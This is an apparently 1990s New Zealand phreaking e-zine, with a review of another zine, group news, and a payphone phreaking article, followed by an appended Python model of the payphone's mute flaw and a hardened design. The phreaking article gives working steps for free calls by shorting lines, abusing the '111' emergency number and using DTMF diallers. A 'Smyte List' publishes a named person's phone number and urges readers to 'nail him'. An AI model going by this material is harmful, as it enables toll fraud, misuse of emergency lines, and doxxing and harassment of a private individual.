It looks as though 'ToT' is in too much of a hurry to be known widespread - 'slow and steady wins the race' would be a good phrase to put there.

Following is an 'article-by-article review' of 'ToT#2':

[REVIEW]

[Articles One-Three: Clickers]

Clickers. I haven't known of one which has worked yet, but that might just be that those of whom have used them had not used them correctly. Strange that they hadn't managed to work for about four people, but I guess you'll just have to try them out for yourself considering that I haven't tried them out myself. At least you'll get your own BBQ lighter... Pretty sure that they'd make a pretty good shock device - could be used as a stun gun if they're what I think they are.

[Article Four: Travel Sickness]

The only flaw I could be sure on commenting on, is the lack of information on what they [the tablets] actually do to the human body and whether or not they're safe (or at least not lethal).
If ideas like this one are printed without thought to any consequences they may have, we may find that a lot of people may suffer injuries due to the lack of information given to the reader. Mind you, if you're silly enough to try something without attempting to find out about it beforehand, then you hold as much responsibility as the person responsible for the printing of the information given.

[Article Five: Busted???]
Well, I guess I have no problems at all with this article. This is an article providing information to the reader which does not prompt for any further action.

[Article Six: Credit Card Calling]
I had just recently covered this in the 'SLi#3' before I had any knowledge of this article at all - it covered basically the same aspects but I'd tried to explain it a little more to make sure it was understood better, but this article is nonetheless okay, even if I disagree with some of the hints to a certain degree. Still, a good article.

[Article Seven: Nut n Bolt Bomb]
It's already well-known that match heads contain explosive chemicals, but I think that the writer of this article COULD have at least pointed out how dangerous this can be - what with the flying shrapnel and the explosiveness of the match head mixture. I was dismayed at the fact that I couldn't spot a single safety warning right throughout the entire magazine at all. [Note: This has already been covered in a few other mags prior to this one, ie. early editions of Phrack among others.]

[Article Eight: Hacking Calling Cardz]
The article was a little vague, but (because of previous experiences with this scenario) I could see what they were trying to explain. I find that if you're more polite, you get what you want quicker instead of having to bumble around with other unnecessary situations - no one likes a pushy operator, so you can imagine how the victims would feel!

[Article Nine: One for the Neighbourz]
Well... I don't really have a comment on this one - read it for yourself..
I'm kind of, uh, "speechless". =)

[Article Ten: Hot Air Balloon]
A nicely presented article. I don't think I'd bother trying to build one though considering I'd find it a fire-hazard if put together wrong and the chances are, I'd do it wrong. Still, worth a try if you're into this sort of thing and are competent in doing so. =)

[Article Eleven: Hidenburg Balloon]
This is just your basic acid-base explosion when you bring a naked flame to Hydrogen[?]. A nice little bang, but watch for flying pieces of glass if there are any - should be careful.

[Article Twelve: Hintz n Tipz for Pot Planting]
A nice little article on (as it says in the title) hints and tips for the planting of marijuana plants. Not bad.. not bad at all. Even if originally posted on "Bad Sector BBS" and then (with the writer's permission, of course) transferred to the magazine - at least it's making use of your resources. =)

[Article Thirteen: How to Pass a Lie Detector Test]
A very entertaining article.. What can I say? I enjoyed reading it. ... But WHERE are you going to have to fake a lie detector test. If you're foolish enuff to get caught, you can guarantee they have enough on you and they WONT need you to confirm or deny it. Well, I guess if you're being interrogated about certain activities concerning friends, this could be handy. Still, a good read - you never know when you might need it.

[Article Fourteen: Just 4 Fun]
Uh, short. Very short in fact. A space filler?

[Article Fifteen: Corn Bombs]
A simple, no nonsense bomb.

[Article Sixteen: Fucking up a BBS]
Old concept. Has been brought up in MANY different places, magazines, person-to-person chats, etc... Simple commonsense really. Telecom seems to be tightening up the security of other peoples services - about time they'd wised up to the old trick!
[Article Seventeen: Hacking CityNet/Genie]
The first part showed potential for something not to laugh at, although, it was an old trick and many people had already been aware of the fact that it was something done quite often. But, why bother when you can just walk in and make your own account? Even one with a fake name. All you need to do is simply USE YOUR COMMONSENSE. As for the hacking of CityNet/Genie passwords with the user's names, you can't guarantee that it's going to work. Is it really worth the trouble? Are you going to bother finding out EVERY SINGLE USER NAME on the system and sit there trying them all day/night? I guess you could spend a couple of minutes/hours/days writing a proggy/shell script to do it for you, but I wouldn't want to tie my phoneline up! The service is free, so isn't that enough?

[Article Eighteen: Strange Auzzie Numberz]
So, how many people out there, who've read this article, are going to fly, float, swim, etc... to Australia? This is of no use to you if you're not planning on visiting them within this half-decade or so. The chances of any flaws, from today still being around by that time are pretty slim due to the technology boom that should occur in the next few years. Although, this is useful if you have friends/associates living in Aussie who you like to keep in contact with.

[Article Nineteen: Hackerz Hit Telecom]
Yet another article dealing with the land mass north-west of New Zealand. The article was okay for light reading, but was of little interest to myself. Similar to 'Article Five: Busted???' in that it is a "media reported" incident.

[Article Twenty: 008 Diverter]
Refer to [Article Eighteen: Strange Auzzie Numberz].

[Article Twenty-One: Eureka]
One word: Childish... Oh, and a couple more: ... next please...

[Article Twenty-Two: Making Napalm]
I highly disliked the example of a cat being used and I have already voiced my opinion on this to 'Raider'.
I'm not too sure whether they [the writers] realize the effects of their ideas seeming that there are going to be those people/kids around who will try ANYthing for the sheer sake of it. Other than the use of the cat in the article, there isn't too much more I'd comment on. Interesting mixture - could be useful...... somewhere.. =)

[Article Twenty-Three: 10 Metre Cigarette Lighter]
The 'cigarette lighter' trick seems okay, the sugar/flour idea is an ancient idea created 'decades' ago. As for the petrol soaked rags, I don't think there are many people who are planning on trying to KILL the 'victim' - at least I'd like to think not.

[Article Twenty-Four: Exploding Rockz]
Could be sore. How do you feel about 'hail'? =)

[Article Twenty-Five: How to Cure a Hangover]
Interesting tips. I'll keep them in mind if I need them! Oh, another tip for how to cure a hangover - so I was informed - just eat a lemon. I know it would surely bring ME down to earth pretty quickly!

[Article Twenty-Six: Coca-Cola Recipe]
Is it really worth the trouble when, in some places, you can get 500ml worth for a single dollar? What if you stuff up? You end up with a large amount of worthless goo - mind you, you could try selling it to the city council to use as TAR. *grin* [Editors Note: Also, Coca, or the leaf of the coca plant, [Cocaine] would be a LOT harder to find at the local supermarket.]

[Article Twenty-Seven: Voodoo Magic]
Each to one's own. If you believe it, go for it, I guess.

[Article Twenty-Eight: Excusez for Missing Class]
Lacked information on the consequences of truancy, and take it from someone who's knowledgeable of these acts. It's just not worth it. As for the cheating in exams - What if you're caught? You may as well forget about getting a job you'll enjoy - you'll be stuck with cleaning floors and packing burgers, fries and Coke. Sounds fun, don't it? [Editor's Note: Or making Coke!]

[Article Twenty-Nine: Greetz and Msgz to Contactz]
The title says it all...
Couldn't find anything wrong with it. =)

[Article Thirty: ToT - The Future?]
Interesting reading. 'Know thine enemy'. Hehe, nah, I don't think it would come to that, but just to be on the safe side... *maniacal grin* *wink*

[Article Thirty-One: Last Wordz]
Normally skipped by the reader, but worth a read anyway.

[FINAL ANALYSIS]

Some of the ideas expressed in 'ToT#2' had already been 'spread about' prior to the release of 'ToT Magazine #2', so repeating the ideas wouldn't have made much impact - especially if a lot of people know about them already. If anything, it's a waste of disk space (j/k!). Some of the articles, I found rather childish and others a little dangerous - not to mention a lack of warnings which was one of my main concerns (it was something we'd also forgot about in our previous mags, but you wise up after chats with Telecom/other authorities!).

As far as I'm concerned, I'd rate this magazine as a 7/10 (I haven't yet come across a 10 yet, so consider me to be a hard marker.. ;) ). The magazine on the whole was 'nice light reading' seeming that the articles are, on average, between a third of a page and a page, in length. Not a bad try for a local Wellington H/P/A group really seeming that they had at least SOMEthing to say.

If you've got a small attention span, and are new to the H/P/A scene, then this is the magazine for you. I found it to be of no practical use to me, but it may do for you - it depends on WHAT you're actually looking for. You don't have to take my word for it - Why not just grab a copy and read it for y'self?

Finally, I'd just like to say - Quality, not Quantity is the key to success with a good magazine. Maybe if the editor was interested less in the latter, and more in the prior, it may show promise. Many electronic magazines don't start out the best - due to lack of organisation - but they normally get sorted out by about their third issue if you're really serious about it.
[NOTES]

We, at SLi, welcome ANY comments at all and thoughts of setting up a 'Letters to the Editors' section in the magazine are in the process of being thought over. Letters will, or will not, be printed depending on whether it's wanted or not - in respective order.

We can be reached at:

NOTE: All Internet addresses at the moment are on hold _DO_NOT_ e-mail us at _ANY_ of our previous e-mail addresses.

This email address works at the time of publication: hacker_m@ix.wcc.govt.nz

Snail Mail:
SLi
PO Box 3030
Onekawa
Napier

SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^                            ^^^^^
^^^^^            SLi             ^^^^^
^^^^^                            ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights inc.

In this part of the mag, WE [the guys and gals of SLi] tell ya what the group is doing.

WHAT IS SLi? and WHAT WE STAND FOR:
Freedom and the right to publish our views and the RIGHT to TEACH _YOU_ what we know. Read the article "Honour" if you want to see what rules we TRY to live by.

Members resigned by choice from SLi:
Digital Omega -- Quit due to personal reasons.

Telco:
Well CyntaxEra's "misuse of a telephone" ooops has sorted itself out...

BBS:
Is finally UP AND running, but VERY private. It's located in Wellington, New Zealand. Email hacker_m@ix.wcc.govt.nz for information on the number and other miscellaneous info.

OFFICIAL SLi BBS's
~~~~~~~~~~~~~~~~~~
(ie. run by SLi MEMBERS)

BBS NAME            MEMBER   PHONE NUMBER/S                  SPEED MODEM
Hacker's Haven BBS  Thorium  +64-6-844-DATA(+646 844 3282)   28.8k BPS    *
SLi BBS             Eon      +64-4-475-SCAN(+644 475 XXXX)   14.4k BPS    !?

* = Only online sometimes.
! = No K0d3z kiddies and NO Warez Puppies!! :)
? = Age limit of 17+. All files checked. UNIX system. 79Meg+ H/P/V files. NO Anarchy, NO Porn, NO Codez and NO Warez permitted on system!

SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^                            ^^^^^
^^^^^      COCOT Phreaking       ^^^^^
^^^^^                            ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights inc.
COCOT Phreaking
~~~~~~~~~~~~~~~

For those of you who are reading this article without any previous knowledge of the common everyday COCOT, I'll begin by giving you a brief outline of this wonderfully strange object... [insert 'The Twilight Zone' movie soundtrack here]

C ustomer
O wned
C oin
O perated
T elephone.

There. Nothing to it. It's one of those small telephones you find in the old shopping mall - in most cases, if there happens to be a 'Telecom Card/Coin Phone' within a 3-metre radius, the chances of there being one around greatly decreases - or your handy service station. In the case of the latter suggestion, there'll almost always be an attendant keeping an eye out on you, but if they're slightly busy, they'll most probably be keeping their eyes out for other things.

[Note: Telecom does know of the shortfalls of these fones, and warns their "clients" of the problems these fones have. So the attendants MIGHT know what's wrong with his/her fone and keep an eye out.]

In the following, I'll just go over my 'observations' of these fones, and attempt to explain a bit about how they work - well, as far as I'm aware of, anyway.

[Note: Considering the fact that New Zealand doesn't have the same 'Freedom of Speech' Act, as there is in the States, I'm a little wary of writing this article, so I'll try and keep the ideas to a minimum - that's all they are... ideas.]

[Type One]

Description: 'Blue-Buttoned Telephone'.
[NOTE: If you try 'Idea One' you may be able to use any 'Blue-Buttoned' fone, but, if you are trying 'Idea Two', you must use the particular type which is listed below.]
LCD Display shows a blinking 'COIN' which takes up the entire LCD display. When dialling, it doesn't bring up the number onto the display, but you SHOULD be able to hear it dialling.

Major Colours: Blue, white, grey and black.

[Idea One]
Get a pin.
Dial the number you want to call, push the pin through the wire, running from the fone into the wall, so it shorts the wires together thus making it impossible for the fone to disconnect. Hang up the fone and pick it back up. Dial '111' and pull the pin out. There you go - a free call.

[Idea Two]
Pick up the receiver and dial the number you want - as though you would normally. It should dial the number for you, and if the line isn't busy, you should be put through okay. Once the person answers, dial '111' and it should free you from the mute - allowing you to speak freely with the person you have just called. If you get a 'no-such-number' answer, then perhaps there is a toll-bar on the phone line of the COCOT, otherwise, try another COCOT.

[Explanation]
With these 'blue-buttoned fones', you get your dial-tone and you're even permitted to use the keypad. The only problem... the microphone. The microphone is muted to stop the person from using the telephone and (from what I'm aware of) can only be 'de-muted' by the user of the telephone inserting a coin, OR dialling '111' [the emergency phone number in NZ - for those of you who are unfamiliar with the number].

After the numbers '111' are dialled - regardless of whether the phone has a dial-tone, or not - the microphone loses the 'mute button', and allows the user of the fone to speak into the microphone whilst allowing the receiver of the call to hear the caller. Of course, the receiver of the phone is unchanged, which allows the caller to hear the recipient of the call, to allow the caller to hear the dial-tone.

[Type Two]

Description: 'Brown-Buttoned Telephone'
[NOTE: They have a big orange button with an 'A' on it.]
These fones are becoming less common, but are still around. They have been replaced by either the 'blue-buttoned fone' or have an annoying 'beep' added especially to help us fone phreaks out (NOT!).
A few times, I have come across the odd one or two which have an interrupted dial-tone - a fake one which sticks around until you drop your dandy coin into the coin slot.

Major Colours: Brown, orange, white and traces of black.

[Idea One]
Attain yourself a DTMF dialler and wander off to your nearest 'brown buttoned telephone'. Just put the dialler's microphone up to the UN-MUTED microphone on the telephone's receiver, and dial away. Once the person answers, begin to talk. =)

[Explanation]
The coin's only use appears to be to give the caller access to the dialling pad. Well, the older versions seem to give that appearance - seeming that there are newer versions hanging about with similar problems (ie. the false dial-tone). The outer casing (the telephone case) is the same and the only way to tell the difference is to try things out for yourself. This is a case of just hoping that you're lucky enough to find the ones which work.

[Type Three]

Description: 'The Red Phone'
These are these rather big, rather OLD, rather chunky, rather, err, well, RED fones. They have a little red button on them that automatically dials '111'.

Major Colours: Uh, a kinda RED colour. Has traces of white on the keypad for the numbers.

[Idea One]
The keypad is the only thing not connected so the ol' DTMF trick will work fine. They seem to be in a lot of T.A.B.'s [horse betting places for those of you who don't know that already]. Simple, aint it?

[Idea Two]
I assume you can also pulse dial using the switch-hook. For those who don't know how to use pulse-dialling, just tap the switch-hook down for a 'split-second' the number of times you need to dial the number with a space of silence between each number (so it knows when the next number is being dialled). It is a VERY old trick, but I thought I'd add it for those interested.

[NOTE: These apply to NZ, but I can't remember what they are everywhere else and plus, I'm not going to type down ALL of the respective numbers!]
Phone Number Number of times to press s-h 0 - 10 1 - 9 2 - 8 3 - 7 4 - 6 5 - 5 6 - 4 7 - 3 8 - 2 9 - 1 ie. Say you want to dial, 001-202-542-873, you would do this: tap the s-h 10 times, pause, 10, pause, 9, pause, 8, pause, 10, pause, 8, pause, 5, pause, 6, pause, 8, pause, 2, pause, 3, pause, 7. An easy way of remembering it, is to simply add the number to the amount of taps of the switch-hook and it should equal 10. This is an old idea, but it works on these old phones. SLi ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^ ^^^^^ ^^^^^ Smyte List ^^^^^ ^^^^^ ^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Southern Lights inc. Well, as in all other SLi mags - except #1 - here's a person [and his info] who has done a pretty stupid thing, and got the members of SLi pissed at him. Name Info Reason --------------------+-------------------------+------------------------------ Johnathon Patterson +64-4-527-8021 Pissed CyntaxEra off - not to aka [-=[THE_FLY]=-] mention a LOT of other ppl. [Eon's note: This guy insulted Cyntax and I. He DESERVES ALL he GETS. Nail him.] [Note: If you have someone who has pissed you off lately, you want to 'get in touch' with them and think that we MIGHT have their info, just giz us a bell with your reason for getting back at this person and we'll see what we can do for ya.] SLi ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^ ^^^^^ ^^^^^ Editors Knotez ^^^^^ ^^^^^ ^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Southern Lights inc. Damn it! Yet another one of these things! :) Ahh, well, me and Cyntax 'ave given up dak, Oh, yeah - Happy April Fools! :=) Well, it's the end of another SLi mag. Guess it's getting rather predict- able now. Well, SLi BBS PRIVATE NODE is up! Email hacker_m@ix.wcc.govt.nz if you want the number and instructions to login including the bbs passwd and stuff. Oh, BTW, it's 14.4... :) ALSO!!! if you want to send us a note, post it to our PO BOX. Here is the shout out you wanted MysTix! PS. SLi V should be out in 3-4 months. 
Yeah someone wrote me asking if there was a way to turn off call waiting. Now, I think it's *52.

Oh, and I'd like to say TELECOM RISK MANAGEMENT (aka. Telco security) isn't that bad. Hey, I'd even accept some feedback from them. :) Anyone wanna write me a letter? I'm sure you can find my address :\ I take that back. I'll just say, "tnx Heather" :-< [Maybe I was wrong. They just killed Cyntax's 3-Way and stuff cause of her VMB "ooops". So be it.]

God, that Bill Gates guy is a s[h]muck! What an _elite_ haircut he has! And, the glasses! Yuck! Oh, god! Look at the tie!! Yellow and black rectangles! Of course this is MY opinion and may not be that of the civilized world [CyntaxEra's Note: Apologies go out to any people reading this who have that tie - we're very sorry for you. ;)]

Another Tip: SLi uses 2048 bit encryption on our IMPORTANT junk, and 512 on our misc stuff - thanks to PGP 2.4x.

Any BBS's that would like to become an OFFICIAL SLi release point, please POST a letter to the SLi PO Box, or email me: HACKER_M@IX.WCC.GOVT.NZ.

A Final NOTE:

We are ALL New Zealanders - not black, not white but united under ONE flag. We are one nation. May we once again become one people. Our flag is the symbol of our country, to all who spit on it, to all who stomp on it. Take note that thousands died for that flag - both white and black! Do not EVER stand on, or deface, OUR symbol of OUR country, for we are ONE people united. If you wish to show your disapproval, do it in a righteous and honourable way. Not in such a childish and immature way without any fore-thought at all.

[This is in accordance to the current disagreements between NZ and a small percentage of Maori New Zealanders in reference to this year's Waitangi Day - A day which should have been celebrated by all. Sadly the acts of a few have made this country two people under one divided flag.
Be ashamed of yourself all who took part in the division of New Zealand, for these acts will live in the history of New Zealand forever as the day New Zealanders became two peoples.]

Well, I'll see you all 'round... 'Till next time...

.

Life is Cursed. For all who live must die.

eof
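The Type One [Explanation] in the COCOT article above describes a phone that mutes only the microphone and lifts the mute whenever '111' is keyed, whatever state the call is in. As an added illustration (not part of the original magazine and not real payphone firmware), this Python model sets that behaviour beside a controller that withholds digits from the line until payment and honours '111' only as the complete number dialled; the class names, the event format and the sample number are all constructed.

```python
"""Added model of the Type One COCOT mute logic (constructed, not real firmware)."""
from dataclasses import dataclass

EMERGENCY = "111"              # NZ emergency number, as stated in the article
SAMPLE_NUMBER = "045550100"    # constructed sample number, not a real subscriber


@dataclass
class FlawedController:
    """Line is always live; only the mic is muted, and '111' lifts it at ANY time."""
    mic_muted: bool = True
    sent_to_line: str = ""

    def coin(self):
        self.mic_muted = False

    def key(self, digit):
        self.sent_to_line += digit          # every key press reaches the exchange
        # Design flaw: the last three keys are matched with no regard to call state.
        if self.sent_to_line.endswith(EMERGENCY):
            self.mic_muted = False


@dataclass
class HardenedController:
    """Buffers digits until paid; '111' counts only when it is the whole number."""
    paid: bool = False
    mic_muted: bool = True
    digits: str = ""
    sent_to_line: str = ""

    def coin(self):
        self.paid = True
        self._release()

    def key(self, digit):
        self.digits += digit
        self._release()

    def _release(self):
        # Emergency bypass applies only to a call that consists of exactly '111'.
        if self.paid or self.digits == EMERGENCY:
            self.sent_to_line = self.digits
            self.mic_muted = False
        # Otherwise nothing is outpulsed and the mute stays on.


def replay(controller, events):
    """Feed a list of events ('COIN' or a single digit) to a controller."""
    for event in events:
        if event == "COIN":
            controller.coin()
        else:
            controller.key(event)
    return controller


def free_talk_path(controller_cls, events):
    """True if an unpaid, non-emergency call ends with the microphone open."""
    ctrl = replay(controller_cls(), events)
    dialled = "".join(e for e in events if e != "COIN")
    return (not ctrl.mic_muted) and "COIN" not in events and dialled != EMERGENCY


# Constructed event traces for the three cases the article distinguishes.
UNPAID_THEN_111 = list(SAMPLE_NUMBER) + list(EMERGENCY)
EMERGENCY_CALL = list(EMERGENCY)
PAID_CALL = ["COIN"] + list(SAMPLE_NUMBER)

if __name__ == "__main__":
    for cls in (FlawedController, HardenedController):
        print(cls.__name__, "unpaid talk path:", free_talk_path(cls, UNPAID_THEN_111))
```

The hardened model still lets a genuine emergency call through without a coin, which is the requirement the original mute design was trying to meet.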